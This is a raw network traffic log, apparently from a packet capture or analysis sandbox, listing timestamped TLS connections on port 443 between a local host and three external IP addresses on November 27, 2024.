                                                                                          Nov 27, 2024 15:15:15.553991079 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.554059029 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.554064035 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.558671951 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.558679104 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.558741093 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.561945915 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.562004089 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.562007904 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.565170050 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.565258026 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.568514109 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.568582058 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.570008993 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.570507050 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.570512056 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.574965954 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.575042963 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.576972961 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.577032089 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.577038050 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.581314087 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.581398964 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.584785938 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.584841013 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.590913057 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.591033936 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.591033936 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.591108084 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.591660023 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.591665983 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.591711998 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.597670078 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.597768068 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.598020077 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.615410089 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.615509987 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.628554106 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.628654957 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.628663063 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.679656029 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.701375008 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.701481104 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.706651926 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.706747055 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.709716082 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.710011959 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.710078955 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.710115910 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.710233927 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.710244894 CET44349735104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.710258007 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.710300922 CET49735443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.712378979 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.712457895 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.712467909 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.717449903 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.717513084 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.717519999 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.728357077 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.728435040 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.728441000 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.728511095 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.737529993 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.737538099 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.737616062 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.737695932 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.738411903 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.747472048 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.747478962 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.747531891 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.757683992 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.757769108 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.757774115 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.757822990 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.762780905 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.762788057 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.762840986 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.769284010 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.769364119 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.775684118 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.775744915 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.782244921 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.782308102 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.785569906 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.785656929 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.791951895 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.792031050 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.795454979 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.795521021 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.801898003 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.801961899 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.901546955 CET4434973735.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.901819944 CET49737443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:15.901850939 CET4434973735.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.902967930 CET4434973735.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.903038979 CET49737443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:15.904267073 CET49737443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:15.904333115 CET4434973735.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.904439926 CET49737443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:15.913260937 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.913353920 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.917948961 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.918025970 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.924158096 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.924237967 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.929928064 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.929989100 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.936345100 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.936434031 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.939147949 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.939219952 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.943820000 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.943907022 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.946417093 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.946490049 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.947359085 CET4434973735.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.949675083 CET49737443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:15.949687958 CET4434973735.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.950733900 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.950808048 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.957875013 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.957966089 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.958842039 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.958915949 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.958925009 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.958935022 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.958977938 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.959028006 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.959039927 CET44349736104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.959084034 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.959120989 CET49736443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.962184906 CET49738443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.962214947 CET44349738104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.962796926 CET49738443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.963093042 CET49738443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:15.963105917 CET44349738104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:15.996681929 CET49737443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:16.369729996 CET4434973735.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:16.369822025 CET4434973735.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:16.370022058 CET49737443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:16.370093107 CET49737443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:16.370125055 CET4434973735.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:16.370160103 CET49737443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:16.370265007 CET49737443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:16.370716095 CET49739443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:16.370743036 CET4434973935.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:16.370821953 CET49739443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:16.371099949 CET49739443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:16.371117115 CET4434973935.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:16.511079073 CET49740443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:16.511136055 CET44349740104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:16.511214018 CET49740443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:16.511496067 CET49740443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:16.511511087 CET44349740104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:17.271301985 CET44349738104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:17.271581888 CET49738443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:17.271595001 CET44349738104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:17.271902084 CET44349738104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:17.272285938 CET49738443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:17.272335052 CET44349738104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:17.272450924 CET49738443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:17.315332890 CET44349738104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:17.673526049 CET4434973935.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:17.673839092 CET49739443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:17.673860073 CET4434973935.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:17.674206972 CET4434973935.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:17.674523115 CET49739443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:17.674587965 CET4434973935.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:17.674664021 CET49739443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:17.719320059 CET4434973935.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:17.747459888 CET44349738104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:17.747529984 CET44349738104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:17.748749018 CET49738443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:17.749115944 CET49738443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:17.749130964 CET44349738104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:17.808147907 CET44349740104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:17.808407068 CET49740443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:17.808414936 CET44349740104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:17.808744907 CET44349740104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:17.809047937 CET49740443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:17.809107065 CET44349740104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:17.809174061 CET49740443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:17.855320930 CET44349740104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:18.153337955 CET4434973935.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:18.153417110 CET4434973935.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:18.153625965 CET49739443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:18.153696060 CET49739443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:18.153719902 CET4434973935.190.80.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:18.153731108 CET49739443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:18.153767109 CET49739443192.168.2.1635.190.80.1
                                                                                          Nov 27, 2024 15:15:18.263876915 CET44349740104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:18.263967991 CET44349740104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:18.264045000 CET49740443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:18.264712095 CET49740443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:18.264733076 CET44349740104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:18.268410921 CET49741443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:18.268455982 CET44349741104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:18.268543005 CET49741443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:18.269016027 CET49741443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:18.269031048 CET44349741104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:18.300801039 CET49742443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:18.300843954 CET44349742104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:18.300996065 CET49742443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:18.301393986 CET49742443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:18.301407099 CET44349742104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:19.524725914 CET44349741104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:19.525044918 CET49741443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:19.525124073 CET44349741104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:19.525510073 CET44349741104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:19.525918961 CET49741443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:19.525995970 CET44349741104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:19.526124954 CET49741443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:19.571331978 CET44349741104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:19.613496065 CET44349742104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:19.613804102 CET49742443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:19.613815069 CET44349742104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:19.614152908 CET44349742104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:19.614456892 CET49742443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:19.614518881 CET44349742104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:19.614625931 CET49742443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:19.655333996 CET44349742104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:19.983793020 CET44349741104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:19.983858109 CET44349741104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:19.983942032 CET49741443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:19.984757900 CET49741443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:19.984778881 CET44349741104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:20.075895071 CET44349742104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:20.075970888 CET44349742104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:20.076028109 CET44349742104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:20.076034069 CET49742443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:20.076105118 CET49742443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:20.076992035 CET49742443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:20.077003956 CET44349742104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:20.442825079 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:20.442884922 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:20.443003893 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:20.443248987 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:20.443267107 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:21.708019972 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:21.708349943 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:21.708405972 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:21.708734035 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:21.709053993 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:21.709141016 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:21.709240913 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:21.709323883 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:21.709368944 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:21.709512949 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:21.709554911 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.337898970 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.338006020 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.338037014 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.338164091 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:22.338196993 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.338280916 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:22.346374989 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.353089094 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.353286028 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:22.353302956 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.361795902 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.361855984 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:22.361871958 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.370682001 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.370742083 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:22.370757103 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.424804926 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:22.458224058 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.504822016 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:22.504842043 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.552855015 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:22.552906990 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.555157900 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.555274963 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:22.555294991 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.562455893 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.562546015 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:22.562570095 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.570012093 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.570101976 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:22.570120096 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.577513933 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.577590942 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:22.577709913 CET49743443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:22.577733040 CET44349743104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.580275059 CET49744443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:22.580377102 CET44349744104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:22.580497980 CET49744443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:22.580702066 CET49744443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:22.580740929 CET44349744104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:23.846312046 CET44349744104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:23.846709967 CET49744443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:23.846743107 CET44349744104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:23.847052097 CET44349744104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:23.847354889 CET49744443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:23.847419024 CET44349744104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:23.847510099 CET49744443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:23.895323992 CET44349744104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:24.261344910 CET49745443192.168.2.1652.149.20.212
                                                                                          Nov 27, 2024 15:15:24.261409998 CET4434974552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:15:24.261503935 CET49745443192.168.2.1652.149.20.212
                                                                                          Nov 27, 2024 15:15:24.261912107 CET49745443192.168.2.1652.149.20.212
                                                                                          Nov 27, 2024 15:15:24.261929035 CET4434974552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:15:24.302845955 CET44349744104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:24.302922964 CET44349744104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:24.302984953 CET49744443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:24.303895950 CET49744443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:24.303924084 CET44349744104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:26.130625963 CET4434974552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:15:26.130836964 CET49745443192.168.2.1652.149.20.212
                                                                                          Nov 27, 2024 15:15:26.134845972 CET49745443192.168.2.1652.149.20.212
                                                                                          Nov 27, 2024 15:15:26.134855986 CET4434974552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:15:26.135148048 CET4434974552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:15:26.140997887 CET49745443192.168.2.1652.149.20.212
                                                                                          Nov 27, 2024 15:15:26.187331915 CET4434974552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:15:26.873318911 CET4434974552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:15:26.873347044 CET4434974552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:15:26.873403072 CET4434974552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:15:26.873497009 CET49745443192.168.2.1652.149.20.212
                                                                                          Nov 27, 2024 15:15:26.873536110 CET4434974552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:15:26.873550892 CET49745443192.168.2.1652.149.20.212
                                                                                          Nov 27, 2024 15:15:26.873589039 CET49745443192.168.2.1652.149.20.212
                                                                                          Nov 27, 2024 15:15:26.909771919 CET4434974552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:15:26.909827948 CET4434974552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:15:26.909883976 CET4434974552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:15:26.909945011 CET49745443192.168.2.1652.149.20.212
